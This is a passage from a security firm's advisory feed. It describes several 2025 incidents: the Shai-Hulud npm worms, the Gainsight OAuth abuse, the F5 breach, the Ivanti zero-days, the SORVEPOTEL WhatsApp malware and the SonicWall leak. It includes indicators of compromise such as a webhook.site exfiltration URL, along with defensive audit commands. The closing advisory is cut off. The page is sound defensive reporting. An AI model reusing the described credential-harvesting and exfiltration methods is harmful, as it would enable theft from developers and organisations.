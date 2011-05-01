I'm Under Attack

Research

The Latest News from Research at Kudelski Security
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Advisory
November 25, 2025

Sha1-Hulud 2.0 NPM Supply-Chain Campaign

Kudelski Security Team

Summary

A new wave of NPM supply-chain attacks, collectively named Sha1-Hulud 2.0, has compromised multiple high-profile package scopes, including Zapier and ENS Domains. The trojanized packages contain malicious preinstall scripts that harvest secrets from developer environments and CI pipelines, exfiltrate data through GitHub repositories and workflows, and attempt self-propagation. The campaign represents a major escalation in NPM ecosystem threats, blending stealthy loaders, automated spreading, and destructive fallback behavior.

Affected Systems

Systems at Risk

  • Node.js / npm environments installing compromised packages.
  • CI/CD systems (particularly GitHub Actions) that run installation scripts.
  • Developer workstations with global or local installs.
  • GitHub repositories tied to developer and organization accounts (due to malicious workflow creation).

Known Affected Package Scopes

(Partial List, for the full exhaustive list please see the appendix of https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains)

  • Zapier:
    • zapier-platform-core, zapier-platform-cli, zapier-platform-schema, @zapier/secret-scrubber, additional @zapier/* pac
  • ENS Domains:
    • @ensdomains/ens-validation, @ensdomains/content-hash, @ensdomains/ensjs, @ensdomains/ens-contracts, @ensdomains/address-encoder, and more.
  • Other Ecosystem Packages:
    • Packages in the PostHog, Postman, and AsyncAPI ecosystems.

Technical Details

The attack is similar to its predecessor, and follows a similar flow with some minor changes. The attack format follows the steps below, and notably now includes the capability for destructive actions.

  1. Maintainer Account Compromise
    Attackers gained access to npm maintainer accounts under targeted scopes and published malicious package versions.
  2. Malicious preinstall Execution
    The trojanized packages embed a preinstall script, executed automatically on installation. This script:
    • Retrieves or installs the Bun JavaScript runtime.
    • Executes obfuscated payloads such as bun_environment.js.
  3. Credential Harvesting
    The payload collects sensitive information:
    • Environment variables
    • Cloud credentials (AWS/GCP/Azure)
    • GitHub tokens, npm tokens
    • Secrets detected via automated scanners
      Collected data is saved to local files (e.g., cloud.json, environment.json).
  1. GitHub-Based Exfiltration & Persistence
    The malware:
    • Registers the host as a self-hosted GitHub runner named SHA1HULUD.
    • Pushes malicious GitHub Actions workflows (discussion.yaml) that exfiltrate secrets.
    • Creates a GitHub repository named Shai-Hulud containing exfiltrated data (double-encoded).
  1. Automated Propagation
    The malware:
    • Uses stolen npm tokens to identify other packages owned by the compromised maintainer.
    • Automatically publishes new malicious package versions — enabling worm-like spread.
  1. Destructive Fail-Safe Behavior
    If credential exfiltration fails, some variants may attempt to wipe the user’s home directory, increasing operational impact.

Mitigation

To reduce risk from the ongoing NPM supply chain attacks, the following is recommended:

  1. Identify & Remove Compromised Packages
    • Uninstall affected packages and downgrade to known-clean versions.
    • Clear local caches:
      npm cache clean --force
  1. Immediate Credential Rotation
    • Revoke and regenerate:
      • GitHub PATs
      • npm tokens
      • SSH keys
      • Cloud provider keys
    • Enforce phishing-resistant MFA on all developer accounts.
  1. Audit GitHub Repositories & Workflows
    Look for:
    • Repositories named Shai-Hulud
    • Suspicious workflow files in .github/workflows/
    • Unexpected GitHub runner registrations
    • Strange branches (e.g., shai-hulud)
  1. Harden CI/CD Security
    • Disable or restrict the execution of lifecycle scripts in CI.
    • Enforce outbound network filtering on build systems.
    • Replace long-lived tokens with short-lived or OIDC-issued credentials.
  1. Governance & Developer Guidance
    • Enforce package signing or verification (where supported).
    • Require 2FA on npm accounts.
    • Provide secure package publishing training.

Indicators of Compromise (IoCs)

The CFC is closely monitoring the ongoing campaign and will provide further updates as necessary. Additionally a threat hunting campaign will be launched based on any available IOC's.

  1. File & Directory Artifacts
Artifact Description
setup_bun.js Malicious preinstall script used to deploy the Bun runtime and payload.
bun_environment.js Obfuscated payload executed during the install process.
data.json Double-base64-encoded exfiltrated data pushed to malicious GitHub repo.
.github/workflows/discussion.yaml Malicious workflow enabling exfiltration triggered via Discussions.
.github/workflows/shai-hulud*.yml Other variations of malicious workflow files.
Local JSON dumps (environment.json, cloud.json, contents.json, truffleSecrets.json) Files containing harvested secrets prior to exfiltration.
  1. Network & Exfiltration Indicators
IOC Description
webhook.site Common exfiltration endpoint used in the campaign. Ideally high-entropy payloads (base64) or large JSON payloads to GitHub API.
GitHub Actions API: /actions/runners/registration-token Used to register unauthorized self-hosted runner.
Abnormal outbound POSTs to GitHub API Used to push malicious repo, discussions, workflows.
GitHub repo named Shai-Hulud Repository used by malware to store stolen data.
  1. Suspicious GitHub Behaviors
Indicator Description
New GitHub repository: Shai-Hulud Created automatically by malware for exfiltration.
Unapproved workflows added under .github/workflows/ Especially discussion.yaml.
Branches: shai-hulud, *-migration, or unexpected feature branches Often used for workflow deployment.
Self-hosted runner registered as: SHA1HULUD A high-confidence compromise indicator.
Sudden spikes in Discussions events Trigger exfil workflows.

What the Cyber Fusion Center is Doing

The CFC is closely monitoring the ongoing campaign and will provide further updates as neccessary. Additionally a threat hunting campaign will be launched based on any available IoC's.

References

  • https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains
  • https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack
Security Advisory
November 21, 2025

UPDATE: Compromise of Third-Party Application Gainsight Enables Salesforce OAuth Token Abuse

Kudelski Security Team

Summary

On 19–21 November 2025, Salesforce detected unusual and unauthorized activity associated with Gainsight-published Connected Apps installed in customer Salesforce orgs. This activity appears to involve OAuth token misuse, allowing threat actors to make API calls into customer environments through the delegated privileges of the Gainsight applications.

Salesforce responded by revoking all access and refresh tokens associated with Gainsight-published integrations and temporarily removing the applications from the AppExchange while investigations continue. Gainsight has acknowledged the incident and engaged Mandiant for forensic investigation.

Gainsight emphasizes that the issue is not caused by a vulnerability within Salesforce itself, but arises from external OAuth access to Salesforce via third-party applications. The threat actor ShinyHunters has claimed responsibility; attribution remains unverified.

Affected Systems and/or Applications

  • Gainsight-published Connected Apps, including (per Gainsight):CS
    • Community / CC
    • Northpass / CE
    • Skilljar / SJ
    • Staircase / ST (listed in some communications only)
  • Salesforce orgs where these applications were installed and authorized.
  • OAuth access tokens and refresh tokens issued to Gainsight Connected Apps (revoked by Salesforce).
  • Third-party connectors relying on Gainsight’s integration layer, such as HubSpot and Zendesk connectors, which Gainsight has temporarily disabled while investigating.
  • Delegated-access integrations using OAuth tokens that may have been abused to access Salesforce APIs.

Salesforce initially identified three impacted customer orgs, later expanded as the investigation continued (exact number not publicly disclosed).

Technical Details

Incident Overview

  • Salesforce identified API calls from non-whitelisted IP addresses made through the Gainsight Connected App.
  • This activity indicates potential OAuth token compromise or unauthorized token reuse.
  • Gainsight confirmed that external connections to Salesforce via Gainsight apps were the vector; there is no Salesforce platform vulnerability.

Attack Chain (current understanding)

  1. Threat actors obtained or abused OAuth access/refresh tokens associated with Gainsight-published applications.
  2. Attackers used these tokens to authenticate to Salesforce APIs via the Gainsight Connected App.
  3. Salesforce observed anomalous API activity and revoked relevant tokens globally.
  4. Gainsight began internal analysis, disabled connectors, and engaged Mandiant.

Timeline (from Salesforce + Gainsight updates)

  • 19 Nov – Afternoon: Salesforce notifies Gainsight about unusual activity originating from Gainsight apps.
  • 19 Nov – Evening: Gainsight engineering initiates IR actions; Salesforce revokes tokens.
  • 20 Nov: Gainsight restores some non-Salesforce jobs; confirms small number of affected orgs.
  • 21 Nov: Salesforce updates help article; Gainsight releases extended FAQ; ongoing analysis by Mandiant.

Impact (current visibility)

  • Data types potentially exposed: Due to delegated OAuth privileges, possible exposed data includes Salesforce objects commonly accessibleby Gainsight (e.g., Accounts, Contacts, Tasks, Cases, Engagement metadata). Exact objects or volumes are not publicly confirmed.
  • Threat actor attribution: ShinyHunters claims responsibility; Salesforce and Gainsight have not validated attribution.
  • Scope of exfiltration: Not publicly disclosed. Gainsight states only “a small number of orgs” showed anomalous activity.

Tactics & Techniques

  • OAuth token compromise and misuse
  • Abuse of delegated API access from third-party SaaS apps
  • Access from non-trusted IPs
  • Consistent with a broader trend of OAuth-based supply-chain attacks on Salesforce ecosystems (as noted by Quorum Cyber and others)

Mitigation

The following actions should be prioritized immediately:

Immediate Containment

  • Revoke all OAuth tokens associated with Gainsight-published Connected Apps (Salesforce has done this centrally; validate locally).
  • Disable or pause Gainsight OAuth authentication until reauthorization steps are provided by Gainsight.
  • Rotate all credentials and secrets associated with:
    • Gainsight service accounts
    • API keys
    • Connected App client secrets

Log Review & Threat Hunting

  • Conduct targeted review of:ConnectedAppUsage logs
    • API login history
    • Session logs for non-whitelisted IPs
    • Unusual API query bursts or metadata access patterns
    • Hunt for indicators of compromise (IoCs): see the last section for Indicators of Compromise (IOCs).

Access Control Hardening

  • Enforce MFA for service accounts where applicable.
  • Apply strict IP allowlists for high-privilege integration accounts.
  • Validate and minimize OAuth scopes granted to all Connected Apps.
  • Disable unused or legacy integrations.

Third-Party Risk Controls

  • Audit all SaaS-integrated Connected Apps across your Salesforce org.
  • Ensure least-privilege access model for all OAuth-connected systems.
  • Evaluate continuous monitoring controls for OAuth-token issuance and usage.

Communication & Stakeholder Coordination

  • Notify internal legal, compliance, and customer-experience teams where applicable.
  • Prepare downstream communications if customer data exposure is confirmed.
  • Monitor ongoing updates from Gainsight and Salesforce.

Indicators of Compromise (IOCs) (from Salesforce Help Article ID 005229029)

IOCType Value FirstSeen LastSeen Observed Activity
IPAddress 104.3.11.1 2025-11-08 2025-11-08 AT&T IP; reconnaissance and unauthorized access.
IPAddress 198.54.135.148 2025-11-16 2025-11-16 Mullvad VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 198.54.135.197 2025-11-16 2025-11-16 Mullvad VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 198.54.135.205 2025-11-18 2025-11-18 Mullvad VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 146.70.171.216 2025-11-18 2025-11-18 Mullvad VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 169.150.203.245 2025-11-18 2025-11-18 Surfshark VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 172.113.237.48 2025-11-18 2025-11-18 NSocks VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 45.149.173.227 2025-11-18 2025-11-18 Surfshark VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 135.134.96.76 2025-11-19 2025-11-19 IProxyShop VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 65.195.111.21 2025-11-19 2025-11-19 IProxyShop VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 65.195.105.81 2025-11-19 2025-11-19 Nexx VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 65.195.105.153 2025-11-19 2025-11-19 ProxySeller VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 45.66.35.35 2025-11-19 2025-11-19 Tor VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 146.70.174.69 2025-11-19 2025-11-19 Proton VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 82.163.174.83 2025-11-19 2025-11-19 ProxySeller VPN proxy IP; reconnaissance and unauthorized access.
IPAddress 3.239.45.43 2025-10-23 2025-10-23 AWS IP; reconnaissance against customers with compromised Gainsight access token.
UserAgent python-requests/2.28.1 2025-11-08 2025-11-08 Not an expected UA for Gainsight app; used with other IOCs.
UserAgent python-requests/2.32.3 2025-11-16 2025-11-16 Not an expected UA for Gainsight app; used with other IOCs.
UserAgent python/3.11 aiohttp/3.13.1 2025-10-23 2025-10-23 Not an expected UA for Gainsight app; used with other IOCs.
UserAgent Salesforce-Multi-Org-Fetcher/1.0 2025-11-18 2025-11-19 Used by threat actor for unauthorized access; also seen in Salesloft Drift activity.

References

  • Salesforce Help Article: https://help.salesforce.com/s/articleView?id=005229029&type=1
  • Gainsight – Incident FAQs: https://communities.gainsight.com/community-news-2/salesforce-gainsight-connected-app-incident-faqs-29809
  • Gainsight – Nov 20 Update: https://communities.gainsight.com/community-news-2/salesforce-gainsight-connected-app-incident-faq-november-20th-afternoon-update-29801
  • Gainsight – Nov 21 Update: https://communities.gainsight.com/community-news-2/salesforce-gainsight-connected-app-incident-faq-november-21st-update-29807
  • AppOmni Analysis: https://appomni.com/blog/salesforce-gainsight-unauthorized-access-security-advisory/
  • The Hacker News: https://thehackernews.com/2025/11/salesforce-flags-unauthorized-data.html
  • ShadowOpsIntel Campaign Overview: https://www.ampcuscyber.com/shadowopsintel/new-campaign-targeting-salesforce-customer-data-via-gainsight-published-apps/
  • Quorum Cyber Reporting on OAuth Attacks: https://www.quorumcyber.com/threat-intelligence/surge-in-salesforce-data-theft-campaigns-exploiting-oauth-integrations-and-vishing-attacks
Advisory
Security Advisory
October 16, 2025

F5 Security Incident

Kudelski Security Team

In or around August 2025, F5 discovered that a sophisticated, likely nation‑state threat actor had gained and maintained persistent access to internal F5 systems. In particular, the actor appeared to be after product development and engineering knowledge bases. The attacker exfiltrated files which included source code and technical documentation related to F5’s BIG-IP, F5OS, and other similar offerings. F5 reports that they have contained the intrusion, engaged third‑party forensic/security firms, and begun providing upgraded software and guidance to customers. As of now, F5 states there is no confirmed evidence of exploitation of undisclosed vulnerabilities in customer environments.

It is important to note that theft of source code and internal design details raises the risk that new attack vectors or zero-day exploits could emerge over time.

Affected Systems and/or Applications

Based on current statements from F5 the following are the product lines believed to be impacted or at risk:

  • BIG-IP (all modules) — software (TMOS), hardware, Virtual Edition
  • F5OS
  • BIG-IQ
  • F5’s “Next” / Kubernetes / cloud-native variants (e.g. BIG-IP Next, BNK / CNF)
  • APM clients and other F5-provided ancillary modules
  • Environments using Advanced WAF / ASM profiles (some new CVEs disclosed in October 2025 may also relate)

Technical Details

Based on current details we know that the attackers maintained long-term access to F5's internal systems, which led to the exfiltration of files that included source coded, and undisclosed vulnerabilities. Per F5 they do not believe that the supply chain pipeline was tampered with, and that no code was modified to introduce backdoors. However, based on the duration and access that the adversaries had they would have gained deeper visibility into internal code, architectures, and possibly even development-time vulnerabilities. Given that this notice was released alongside the Quarterly Security Notification (K000156572), and include newly released vulnerabilities, it is possible that they may be tied to this. Below are two such recent vulnerabilities which highlight that functionality modules may be attacked via malformed inputs, possibly leveraging knowledge gained from exfiltrated code:

  • CVE‑2025‑54858 — A vulnerability in BIG-IP Advanced WAF / ASM when using a JSON content profile with malformed JSON schema. Under certain requests, the bd process may terminate, causing availability problems. Affects versions prior to certain patched releases (e.g. < 17.5.1.3, < 17.1.3, < 16.1.6.1).
  • CVE‑2025‑61935 — Another vulnerability impacting Advanced WAF / ASM, where use of certain requests may cause unexpected termination of bd when a security policy is configured on a virtual server.

Temporary Mitigations

While F5 works to remediate and support customers, the following mitigations can reduce potential exposure:

  • Isolate / restrict management interfaces
  • Apply the latest patches / upgrades immediately
  • Rotate credentials, API keys, certificates
  • Hunt for anomalies / forensic review
  • Communicate with F5 / obtain their guidance
  • Segment / limit exposure of dependent systems

What the Cyber Fusion Center is Doing

The CFC is actively monitoring the situation and will continue to research and provide our findings. Additionally, we have implemented increased awareness for activity involving F5 BIG-IP. At this time, the main recommendations are to do the following:

  • Enable BIG-IP event streaming to SIEM and configure the systems to log to a remote syslog server and monitor for login attempts
  • Utilize the F5 iHealth Diagnostic Tool, which can now flag security risks, vulnerabilities, prioritize actions, and provide remediation guidance.
  • Identify all F5 products (hardware, software, and virtualized) and ensure that no management interface is exposed on the public web. If an exposed interface is discovered, companies should make compromise assessment."
  • Regarding threat hunting F5 is partnering with CrowdStrike to extend Falcon EDR sensors and Overwatch Threat Hunting to BIG-IP for additional visibility and to strengthen defenses. An early access version will be available to BIG-IP customers and F5 will provide all supported customers with a free Falcon EDR subscription. Additionally when threat hunting guidance is made available it will be reviewed.

References

Threat Research
Security Advisory
October 9, 2025

13 Unpatched Ivanti Endpoint Manager Zero-days Disclosed

Kudelski Security Team

The Zero Day Initiative (ZDI) has publicly disclosed 13 unpatched zero-day vulnerabilities affecting Ivanti Endpoint Manager. These vulnerabilities were privately reported to Ivanti between June and November 2024, but released publicly after the vendor failed to provide patches within a timeline acceptable to ZDI. The two most critical bugs offer attackers unauthenticated remote code execution (ZDI-25-935) and escalation to SYSTEM-level privileges (ZDI-25-947), while the remaining 11 are post-authentication SQL injection flaws that could lead to further remote or arbitrary code execution. These vulnerabilities represent a significant risk as two or more could be chained together to achieve full system compromise.

Affected Systems and/or Applications

Ivanti Endpoint Manager: all currently supported versions, cloud and on-prem.

Technical Details / Attack Overview

The disclosed vulnerabilities consist of:

  • ZDI-25-935: An unauthenticated directory traversal vulnerability in the OnSaveToDB method that allows remote code execution with minimal user interaction. Attackers can exploit this by sending specially crafted HTTP requests that traverse directory structures to execute arbitrary code. No user interaction is required if the attacker has administrative credentials to the application.
  • ZDI-25-947: A deserialization vulnerability in the AgentPortal service that enables local privilege escalation to SYSTEM. This flaw occurs when the service processes untrusted data during deserialization operations.
  • 11 additional authenticated RCE vulnerabilities: Post-authentication SQL injection flaws which also enable remote code execution. These vulnerabilities exist in various functions within the Endpoint Manager application; check ZDI's published advisories (in references below) for further details.

Temporary Workarounds and Mitigations

Until official patches are released by Ivanti, recommended actions include:

  • Restrict internet access to Ivanti Endpoint Manager interfaces wherever possible.
  • Consider implementing a WAF or reverse proxy for further sanitization of requests to the EPM.
  • Restrict outbound connections from Ivanti servers to prevent potential command and control communications.
  • Ensure least privilege principles for all users interacting with Endpoint Manager.

What the Cyber Fusion Center is Doing

The CFC will continue monitoring the situation surrounding these vulnerabilities. Exploration of threat hunting possibilities is ongoing. An advisory update will be issued if new information becomes available that could further impact affected systems or require additional mitigation steps.

References

Security Advisory
October 6, 2025

SORVEPOTEL: Self-Propagating Malware Spreading Via WhatsApp

Kudelski Security Team

Summary

A new self-propagating malware campaign, codenamed SORVEPOTEL, has been identified targeting Brazilian users through the popular messaging app WhatsApp. This campaign, primarily affecting Windows systems, is engineered for rapid propagation rather than data theft or ransomware. The malware exploits the trust associated with WhatsApp to spread quickly across enterprise environments, leading to account suspensions due to excessive spam activity.

Technical Details

Initial Infection Vector:

  • Phishing Message: The attack begins with a phishing message sent via WhatsApp from a compromised contact. This message includes a ZIP file attachment that appears to be benign, such as a receipt or a health app-related file.

Malicious ZIP File:

  • Contents: The ZIP file contains a Windows shortcut (LNK) file. This file is designed to execute a PowerShell script when opened.
  • Execution: When the LNK file is clicked, it silently runs a PowerShell command that retrieves the main payload from an external server, such as sorvetenopoate[.]com.

Payload Retrieval and Execution:

  • PowerShell Script: The script is responsible for downloading the main payload, which is a batch script.
  • Batch Script: This script establishes persistence by copying itself to the Windows Startup folder, ensuring it runs every time the system starts.
  • Command-and-Control (C2) Communication: The batch script also executes a PowerShell command to contact a C2 server for further instructions or to download additional malicious components.

Propagation Mechanism:

  • WhatsApp Web Exploitation: If WhatsApp Web is active on the infected system, the malware leverages this session to send the malicious ZIP file to all contacts and groups associated with the victim's account.
  • Automated Spamming: This automated distribution results in a high volume of spam messages, often leading to the suspension or banning of the infected account due to violations of WhatsApp's terms of service.

Persistence and Evasion:

  • Startup Folder Persistence: By placing the batch script in the Startup folder, the malware ensures it is executed upon system reboot.
  • Minimal User Interaction: The campaign is designed to require minimal user interaction, relying heavily on automation and social engineering to propagate.

Targeting and Impact:

  • Enterprise Focus: The requirement for the attachment to be opened on a desktop suggests a focus on enterprise environments, where desktop usage is more prevalent.
  • Regional Focus: The majority of infections have been reported in Brazil, affecting sectors such as government, public service, manufacturing, technology, education, and construction.

Mitigation

  1. User Awareness and Training: Educate users about the risks of opening attachments from unknown or unexpected sources, even if they appear to come from known contacts.
  2. Email and Messaging Security: Implement robust email and messaging security solutions to detect and block phishing attempts and malicious attachments.
  3. Endpoint Protection: Deploy comprehensive endpoint protection solutions capable of detecting and mitigating threats like SORVEPOTEL.
  4. Network Monitoring: Monitor network traffic for unusual activity, such as connections to known malicious domains or unexpected data exfiltration attempts.

What the Cyber Fusion Center is Doing

The CFC is currently:

  • Continuing active threat hunting operations and support engagements in environments impacted by this campaign.
  • Leveraging findings from recent IR cases to refine detection and response capabilities.

References

Advisory
September 23, 2025

Unauthorized Access to SonicWall Cloud Backup Firewall Preference Files

Kudelski Security Team

Summary

SonicWall has issued security guidance in response to a recent incident involving suspicious activity targeting its cloud backup service for firewalls. An investigation revealed that threat actors accessed backup firewall preference files stored in the cloud. While the credentials in these files were encrypted, they contained potentially sensitive information that could be used to exploit related firewalls. This breach has affected less than 5% of SonicWall's firewall install base.

Affected Systems and/or Applications

The affected systems are SonicWallFirewalls that use the cloud backup feature through MySonicWall.com.

Specifically, any firewalls that had their backup preference files stored in the cloud are potentially impacted.

Technical Details

The investigation discovered that the breach involved threat actors gaining access to encrypted firewall preference files, which are stored in the cloud as part of the SonicWall cloud backup service. Although the files are encrypted, they contained information that could facilitate the exploitation of the corresponding firewall devices.

The sensitive data within these files includes, but may not be limited to:

  • Credentials
  • Tokens
  • Other configuration details for services running on SonicWall devices

Although no unencrypted data was found, the exposure of these files increases the risk of future exploitation, especially if the attackers are able to further decrypt or misuse the information.

Mitigation

SonicWall has provided the following mitigation steps for affected users:

  • Login to MySonicWall:
    • Navigate to MySonicWall.com and log into your account.
    • Check if any cloud backups exist for your registered firewalls.
  • Identify Affected Devices:
    • If the backup fields are blank, then your firewall has not been impacted.
    • If backup details are present, proceed to check the Product Management section and then the Issue List.
    • Affected serial numbers will be listed with relevant details such as Friendly Name, Last Download Date, andKnown Impacted Services.
  • Review and Remediate:
    • If your firewall’s serial number appears on the Issue List, it is at risk, and SonicWall recommends following the containment and remediation guidelines outlined in their security documentation.
    • If only some or no serial numbers are shown, you may still be impacted. SonicWall will provide further guidance to assess whether your backup files were compromised.

Additional Recommendations

  • If your firewall is listed as affected, SonicWall recommends immediately changing all credentials and tokens associated with the impacted services.
  • Keep an eye on your firewall’s logs and activity to identify any signs of abnormal behavior or exploitation.
  • Stay updated with SonicWall’s security bulletins for additional actions, and follow their official guidelines for containment and remediation.

What the Cyber Fusion Center is Doing

The Cyber Fusion Center (CFC) is actively engaged in monitoring the situation surrounding the compromised SonicWall backup firewall preference files. An advisory update will be issued if new indicators, techniques, or escalations are identified that could further impact affected systems or require additional mitigation steps.

References

https://www.sonicwall.com/support/knowledge-base/mysonicwall-cloud-backup-fileincident/250915160910330

https://www.bleepingcomputer.com/news/security/sonicwall-warns-customers-to-reset-credentials-afterMySonicWall-breach/?utm_source=tldrinfosec

https://thehackernews.com/2025/09/sonicwall-urges-password-resets-after.html

Advisory
September 19, 2025

Supply Chain Attack Targeting Several NPM Packages to Harvest Credentials

Kudelski Security Team

Summary

A coordinated supply chain attack has compromised more than 40 NPM packages, including several published under the CrowdStrike publisher account.

The attack works by injecting a malicious script, bundle.js, into selected packages. The injection process involves downloading a package tarball, modifying its package.json to include the malicious script, then repackaging and publishing the trojanized version.

The malware specifically targets the following systems to harvest credentials:

  • GitHub personal access tokens
  • AWS access keys (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
  • Google Cloud Platform service credentials
  • Azure credentials
  • Cloud metadata endpoints
  • NPM authentication tokens

Regarding the affected packages these were quickly removed by the npm registry.

It is important to note that, In the case of CrowdStrike-affected packages, the malicious versions were also removed, and a monitoring alert has been issued. CrowdStrike is actively watching the sitaution.

Affected Systems and/or Applications

The attack primarily targets the following NPM packages.

Regarding CrowdStrike npm packages, they have issued a Tech Alert named NPM Package in Public Registries:

"After detecting several malicious Node Package Manager (NPM) packages in the public PM registry, a third-party open source repository, we swiftly removed them and proactively rotated our keys in public registries. These packages are not used in the Falcon sensor, the platform is not impacted and customers remain protected. We are working with NPM and conducting a thorough investigation. This tech alert will be updated with the results of our investigation and updates as we have them."

Below is the affected list. These were publised under crowdstrike-publisher npm account.

  • @crowdstrike/commitlint8.1.1
  • @crowdstrike/commitlint8.1.2
  • @crowdstrike/falcon-shoelace0.4.2
  • @crowdstrike/foundry-js0.19.2
  • @crowdstrike/glide-core0.34.2
  • @crowdstrike/glide-core0.34.3
  • @crowdstrike/logscale-dashboard1.205.2
  • @crowdstrike/logscale-file-editor1.205.2
  • @crowdstrike/logscale-parser-edit1.205.1
  • @crowdstrike/logscale-parser-edit1.205.2
  • @crowdstrike/logscale-search1.205.2
  • @crowdstrike/tailwind-toucan-base5.0.2
  • browser-webdriver-downloader3.0.8
  • ember-browser-services5.0.3
  • ember-headless-form-yup1.0.1
  • ember-headless-form1.1.3
  • ember-headless-table2.1.6
  • ember-url-hash-polyfill1.0.13
  • ember-velcro2.2.2
  • eslint-config-crowdstrike-node4.0.4
  • eslint-config-crowdstrike11.0.3
  • monorepo-next13.0.2
  • remark-preset-lint-crowdstrike4.0.2
  • verror-extra6.0.1
  • yargs-help-output5.0.3

Technical Details

1. Package Compromise / Injection

  • a popular package is modi!ed to include a large mini!ed JavaScript bundle often named bundle.js. This is done via a hijacked postinstall script in the package’s package.json. The script causes execution of that bundle during npm install.

2. Reconnaissance & Environment Pro!ling

  • Once executed, the malware first checks the operating system. It collects environment variables (process.env) including tokens, credentials, etc.

3. Secret / Credential Harvesting

  • Downloads and executes TruffeHog, a legitimate secret scanner.
  • TruffeHog scans filesystem for high-entropy strings (e.g. AWS keys, other secrets).
  • Use of cloud provider APIs / SDKs to list & retrieve secrets: AWS Secrets, GCP Secret Manager
  • Capturing NPM authentication tokens, GitHub tokens, environment variables etc.StepSecurity

4. Propagation / Lateral Movement in NPM

  • The malware identifies other packages owned by the same maintainer (via NPM registry API) and forces patch-publishing of those packages, injecting the malicious code there. This enables a cascading compromise.

5. Persistence via GitHub Actions Backdoor

  • The attack introduces unauthorized GitHub Actions workflows into repositories, via creating a malicious work$ow !le. This work$ow triggers on pushes, captures repository secrets and exfiltrates them to a hard-coded webhook or C2.

6. Data Exfiltration

  • The collected secrets, credentials, environment data, cloud secrets etc. are packed into JSON payloads. Then exfiltrated either directly (via HTTP/S POST to webhook) or by creating public GitHub repositories (e.g. Shai-Hulud) via GitHub’s API.

Mitigation

To reduce risk from the ongoing NPM supply chain attacks, including those impersonating CrowdStrike packages, implement the following mitigation strategies:

1. Rotate All Tokens & Keys:

  • NPM publish tokens, GitHub access tokens, cloud provider keys, SSH keys etc., especially if those machines installed compromised packages.

2. Lock or Pin Package Versions:

  • Use known-good versions; prevent automatic uptake of newly published versions until they are verified.
  • Use NPM Package Cooldown Check

3. Inspect Postinstall / Preinstall Scripts:

  • In CI/CD or during review, scan for suspicious install / postinstall scripts especially ones that download or execute external code or spawn child processes.
  • Use tools such as Artifact Monitor to check software Artifacts.

4. Monitor NPM Publish Events:

  • Alert on unusual publishing activity from critical namespaces force publishes, publishes outside known CI, or from unexpected IP addresses.

5. Audit Cloud & Secret Manager Access Logs:

  • For example, check for ListSecrets, GetSecretValue, BatchGetSecretValue events during the timeframe when compromised versions may have been installed.
  • Aws Security Audit:
    • # Check CloudTrail for suspicious secret access
    • aws cloudtrail lookup-events --lookup-attributes
    • AttributeKey=EventName,AttributeValue=BatchGetSecretValue
    • aws cloudtrail lookup-events --lookup-attributes
    • AttributeKey=EventName,AttributeValue=ListSecrets
    • aws cloudtrail lookup-events --lookup-attributes
    • AttributeKey=EventName,AttributeValue=GetSecretValue
    • # Review IAM credential reports for unusual activity
    • aws iam get-credential-report --query 'Content'
  • GCP Security Audit:
    • # Review secret manager access logs
    • gcloud logging read "resource.type=secretmanager.googleapis.com" --limit=50 --format=json
    • # Check for unauthorized service account key creation
    • gcloud logging read "protoPayload.methodName=google.iam.admin.v1.CreateServiceAccountKey"

6. Check for Malicious GitHub Work"ows / Branches:

  • Search across org(s) for the shai-hulud branch, and work$ow !les with names like shai-hulud-workflow.yml. Remove them and rotate any repository secrets exposed.

7. Implement Least Privilege in CI/CD & Developer Environments:

  • Reduce what environment variables are exposed; limit permissions for tokens; use ephemeral credentials; ensure machine accounts have minimal rights.

Indicators of Compromise

The following indicators can help identify systems affected by this attack:

Search for malicious workflow file

  • Replace ACME with your GitHub organization name and use the following GitHub search query to discover all instance of shai-hulud-workflow.yml in your GitHub environment. https://github.com/search?q=org%3AACME+path%3A**%2Fshai-hulud-work$ow.yml&type=code

Search for malicious branch. To find malicious branches, you can use the following Bash script:

# List all repos and check for shai-hulud branch
gh repo list YOUR_ORG_NAME --limit 1000 --json nameWithOwner --jq '.
[].nameWithOwner' | while read repo; do
gh api "repos/$repo/branches" --jq '.[] | select(.name == "shai-hulud") |
"'$repo' has branch: " + .name'
done

File Hashes

  • bundle.js SHA-256: 46faab8ab153fae6e80e7cca38eab363075bb524edd79e42269217a083628f09

Network Indicators

  • Exfiltration endpoint: https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7

File System Indicators

  • Presence of malicious work$ow !le: .github/work$ows/shai-hulud-workflow.yml

Suspicious Function Calls

  • Calls to NpmModule.updatePackage function

Suspicious API Calls

  • AWS API calls to secretsmanager.*.amazonaws.com endpoints, particularly BatchGetSecretValueCommand
  • GCP API calls to secretmanager.googleapis.com
  • NPM registry queries to registry.npmjs.org/v1/search
  • GitHub API calls to api.github.com/repos

Suspicious Process Executions

  • TruffleHog execution with arguments !lesystem /
  • NPM publish commands with --force flag
  • Curl commands targeting webhook.site domains

What the Cyber Fusion Center is Doing

The CFC has launched a threat hunting campaign. The objective of this hunt is to identify artifacts and indicators related to the "Shai-Hulud" worm.

References

https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised

https://socket.dev/blog/ongoing-supply-chain-attack-targets-crowdstrike-npm-packages

https://www.stepsecurity.io/blog/introducing-the-npm-package-cooldown-check

https://docs.stepsecurity.io/artifact-monitor

Advisory
Security Advisory
September 17, 2025

Inside a MuddyWater Intrusion: Exploitation of SharePoint and Living-Off-the-Land Tactics

Kudelski Security Team

Summary

